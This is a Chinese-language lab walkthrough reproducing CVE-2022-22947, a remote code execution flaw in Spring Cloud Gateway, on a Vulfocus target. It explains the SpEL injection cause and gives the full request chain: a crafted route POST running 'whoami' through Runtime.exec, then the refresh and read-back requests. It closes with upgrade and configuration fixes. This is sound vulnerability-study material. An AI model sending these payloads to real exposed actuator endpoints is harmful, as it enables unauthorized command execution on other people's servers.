CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现

一、漏洞概述

2022年3月1日，VMware官方发布漏洞报告，在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时，会容易造成代码注入攻击，攻击者可以制造恶意请求，在远程主机进行任意远程执行。

 

二、影响版本

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响
 

三、漏洞原理

大白话就是说：因为ShortcutConfigurable.java中的getValue方法可以被ConfigurationService.java包中ConfigurableBuilder的normalizeProperties函数的this.properties参数控制修改，攻击者通过添加带有filter的恶意路由，当重新加载路由时，会触发对参数的归一化逻辑，从而导致filter参数value中的SPEL表达式被解析。

 大佬文章链接：https://blog.csdn.net/include_voidmain/article/details/123819107

 

四、漏洞复现环境

Kali Linux + Vulfocus
渗透机：Kali Linux 
靶机：Vulfocus

 

五、实验步骤

1.开启vulfoucs并获取实验镜像

 

2.访问网页并抓包

3.构造并发送恶意的路由请求

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.117.131:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like       Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329   {   "id": "hacktest",  "filters": [{ "name": "AddResponseHeader", "args": {   "name": "Result",   "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}" }   }],   "uri": "http://example.com" }

• id 字段指定新路由的名称，必须全局唯一；

filters

字段给这条路由指定若干个过滤器。过滤器用于对请求和响应进行修改；
• name 字段指定要添加的过滤器，这里添加了一个 AddResponseHeader 过滤器，用于 gateway 给客户端返回响应之前添加一个响应头；
• args.name 字段指定要添加的响应头；
• args.value 字段指定响应头的值。这里的值是要执行的 SPEL 表达式，用于执行 whoami 命令。注意需要将命令输出结尾的换行符去掉，否则过滤器执行时会抛出异常说「响应头的值不能以 \r 或 \n 结尾」；
• uri 字段指定将客户端请求转发到 http://example.com。

 

4.应用之前的路由发送此数据包，此数据包可触发表达式

?

1 2 3 4 5 6 7 8 9

POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.117.131:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

 

5.发送此数据包，查看命令回显，可以看到之前添加的路由

?

1 2 3 4 5 6 7 8 9

GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.117.131:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

6.访问actuator API接口

?

1 2 3 4 5 6 7 8 9

GET /actuator HTTP/1.1 Host: 192.168.117.131:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0

 

7.访问env接口并获取flag

 

8.完结撒花

 

六、修复方式

1)3.1.x用户应升级到3.1.1+；

2)3.0.x用户应升级到3.0.7+；

3)如果不需要Actuator功能，可以通过management.endpoint.gateway.enable：false配置将其禁用。

 

七、Poc

1.https://www.cnblogs.com/wavesky/p/16424167.html

2.https://github.com/wave-to/Poc/blob/main/Remote_code_execution/Poc_CVE-2022-22947.py